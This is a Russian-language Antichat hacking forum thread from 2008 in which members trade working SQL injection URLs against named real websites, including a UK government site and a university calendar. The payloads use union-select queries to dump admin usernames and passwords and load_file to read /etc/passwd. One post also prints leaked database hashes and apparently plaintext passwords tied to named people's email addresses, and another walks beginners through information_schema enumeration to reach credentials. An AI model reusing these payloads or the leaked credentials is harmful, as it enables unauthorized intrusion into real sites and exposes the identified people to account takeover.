Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
05.12.2008, 00:15
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
http://www.feltbikes.de
5.0.32-Debian_7etch6:root@localhost:felt_artikel
http://www.feltbikes.de/cross.php?id=-4+union+select+1,2,3,4,load_file(0x2f7661722f7777772f66656c742f6c69627261 72792e706870),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41/*
------------------------------------------------------------------------
http://www.furisto.de
5.0.32- Debian_7etch5:sk0223 2@localhost:usr_sk02 232_1
http://www.furisto.de/component/option,com_ownbiblio/index.php?option=com_ownbiblio&view=catalogue&year =All&catid=1+union+select+1,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users+ limit+1,100/*------------------------------------------------------------------------
http://digital.tomsk.ru
4.0.27-log:digitalwww@localhost
http://digital.tomsk.ru/?IDcatalog=975155&ItemID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
------------------------------------------------------------------------
http://www.diac.ru
http://www.diac.ru/news/comments.php?news_id=-1+union+select+1,2,3,4,5,6,7,8/*
------------------------------------------------------------------------
http://calendar.hpu.edu
Самое вкусное)) - еду!
http://calendar.hpu.edu/event_details.php?event_id=-2555+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40/*
5.0.26-standard:root@localhost:calendar
Подбираем таблицы и колонки!
Еще доступна читалка load_file()
load_file(0x2f6574632f706173737764) - /etc/passwd
load_file(0x2f6574632f706173737764) - function.php
/data0/httpd/calendar/htdocs - Дира!
http://calendar.hpu.edu/admin/ - Админка!
+ Можно перебирать колонки и таблицы! =)
------------------------------------------------------------------------
http://www.roguegovernment.com
4.1.22-standard:roguegov_publicr@localhost:roguegov_rgov
http://www.roguegovernment.com/news.php?id=-4682+union+select+1,2,3,4,5,6/*
------------------------------------------------------------------------
http://www.paristoutcourt.org
5.0.45-Debian_1ubuntu3.3-log aristoutcourtor@88.191.253.131aristoutcourt or
Есть таблица: ptc_users
Поля в таблице: user_login,user_pass,user_email
http://www.paristoutcourt.org/blogs/blog.php?id=7&blog=-1+union+select+1,2,concat_ws(char(58),user_login,user_pass,user_email ),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+ptc_user s/* Дальше через limit
------------------------------------------------------------------------
http://www.viaggiavventurenelmondo.it
5.0.45-Debian_1ubuntu3.3-log:anm_sites@172.17.12.13:cdocanm
Таблица: user
Колонки: login,password
http://www.viaggiavventurenelmondo.it/nuovosito/eventi/cdoc/entry.php?id=1+union+select+1,concat(login,char(58),password),3,4,5,6,7,8,9+from+user/* Дальше через limit
------------------------------------------------------------------------
http://www.kvartira-omsk.ru
5.0.27-standard-log:vashakvartira@localhost:vashakvartira
5ая версия - можно искать таблицы!
------------------------------------------------------------------------
http://www.easybackline.fr
4.1.11-Debian_4sarge7:easybkline@hebergement.oc3.fr:easyb kline
С этим сайтом работае через unhex(hex(...))
------------------------------------------------------------------------
http://www.cliocup.fr
5.0.44-log:root@localhost:wsr
5ая версия! Можно перебирать...
Так же есть читалка через load_file()
load_file(0x2f6574632f706173737764) - /etc/passwd
------------------------------------------------------------------------
Последний раз редактировалось Tigger; 05.12.2008 в 01:33..
|
|
|
05.12.2008, 11:41
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
Пора делать ставки на лошадей *). Казино там итд. В общем таблицы не подобрал буду рад если кто нить подберёт.
http://www.gohorsebetting.com/horseracing/news.php?id=1666+union+select+1,version(),user(),d atabase()/*
Version:4.1.20
Database: allhorse
user: dbconnect@localhost
Индийцы отжигают *)
http://www.superbindia.com/audios/player.php?id=-1426/**/union/**/select/**/1,version(),user(),database(),5,6,7--
Database Version: 5.0.51a-community
Database name: nirup_superbindia
User name: nirup_arupreddy@localhost
|
|
|
|
05.12.2008, 13:45
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
http://www.hiva.be/publicatie_detail_en.php?id=1803[sql]
Dbname: hiva_web
Version: 5.0.18-nt
User: admin@localhost
куча таблиц
mysql.user
localhost:admin:08bda1f87564a3c5 hilda
localhost:rik:78a42964266735dd rik
%:root:36b5abe15fece604 142857
localhost:guest:guest
%:admin:08bda1f87564a3c5
%:liesbeth:1913a30641551198
%:elise:6e0fd8903542daf2 elise
table account_paswoord from database steunpunt_loopbanen
id:email:domain aswoord
1:ides.nicaise@hiva.kuleuven.be:centraal:Linabdal
2:hubert.cossey@hiva.kuleuven.be:centraal:Jwaal123
3:sonja.wuyts@hiva.kuleuven.be:centraal:SoWu3110
4:beatrijs.defraine@ped.kuleuven.be:OD1:dummy
5 atrick.onghena@ped.kuleuven.be:OD1:bAch3500
6 eter.vanpetegem@ua.ac.be:OD1:hlrctal
7 ol.ghesquiere@ped.kuleuven.be:OD1:dummy
8:rita.rymenans@ua.ac.be:OD1:retuow
9:lieven.verschaffel@ped.kuleuven.be:OD1:dummy
10:rianne.janssen@ped.kuleuven.be:OD1:Nobo9632
|
|
|
|
05.12.2008, 13:45
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
http://www.buywithconfidence.gov.uk/tradeCategory.php?id=-158+union+select+1,version(),3,4,5/*
4.1.22-standard
|
|
|
|
05.12.2008, 18:28
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452
Репутация:
36
|
|
http://www.warrenpointharbour.co.uk/service_details.php?category_id=1+order+by+15 - воть!!! Что-то переадресация с union select не АЙС!! Тама сами крутите если получится, напишу!!
|
|
|
|
05.12.2008, 18:32
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452
Репутация:
36
|
|
Воть еще тоже с переадресацией http://www.polymercentre.ru/show.php?id=180'+order+by+1&PHPSESSID=3e29a48f71b1 4b1eae4ce3161e65ac50
Последний раз редактировалось BanQui; 05.12.2008 в 18:35..
|
|
|
|
05.12.2008, 18:54
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452
Репутация:
36
|
|
Вот еще http://www.axonsport.ru/doc/doc.php?ID=35'
|
|
|
|
05.12.2008, 19:24
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452
Репутация:
36
|
|
Воть крутанул : http://vklybe.ru/index.php?o=g&id=-167+union+select+version(),2,3,4
Версия: 5.0.45
Воть для новичков разжую:
http://vklybe.ru/index.php?o=g&id=-167+union+select+version(),2,3,4 - Так узнаем версию
Поскольку версия 5+ то в ней присутсвует - information_schema .... начинаем копаться в ней!!!
http://vklybe.ru/index.php?o=g&id=-167+union+select+table_name,2,3,4+from+information _schema.tables+limit+17,1 и так меняем до +limit+87,1 тама смарите, что вам нужно!
Каким же способом посмареть дапустим таблицу modx_web_users - это limit+85,1 ?? Да очень просто!!! Идем на сайт http://k0x.ru/encoder/index.php ! И в поле Text* пишем modx_web_users и жмем Send! После тама появятся поля, нам нужно самое первое, тобишь HEX тама будет вот такое 0x6d6f64785f7765625f7573657273 ! Это Sql HEX ! Вообще можно просто перевести слово через любую вашу прогу(сайт) и просто добавляем 0x ! Вот такой запрос нужно сделать после того как мы узнали Hex код таблицы modx_web_users :
http://vklybe.ru/index.php?o=g&id=-167+union+select+column_name,2,3,4+from+informatio n_schema.columns+where+table_name=0x6d6f64785f7765 625f7573657273+limit+1,1
Ну вот мы нашли всеми долгожданный username и password ! всё также просматривается через limit+1,1 , limit+2,1 и т.д.
Ну потом смотрим юзернаймы и пассы!!!
|
|
|
|
05.12.2008, 19:26
|
|
Новичок
Регистрация: 26.07.2008
Сообщений: 23
Провел на форуме:
414646
Репутация:
20
|
|
4.1.20
Код:
http://www.communityaction.us/index.php?id=-392+union+select+version()/*
5.0.67-log(Windows)
Код:
http://inuitcircumpolar.indelta.ca/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x40,table_schema,table_name),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+information_schema.tables+limit+17,1--&Lang=En
5.0.45-log
Код:
http://www.cpod.org.au/feed.php?id=6+and+1=0+union+select+1,2,3,version(),table_schema,6,table_name,8+from+information_schema.tables+limit+109,1/*
|
|
|
|
05.12.2008, 22:39
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
BanQui
http://www.axonsport.ru/doc/doc.php?ID=35'+union+select+1,2,version(),4/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
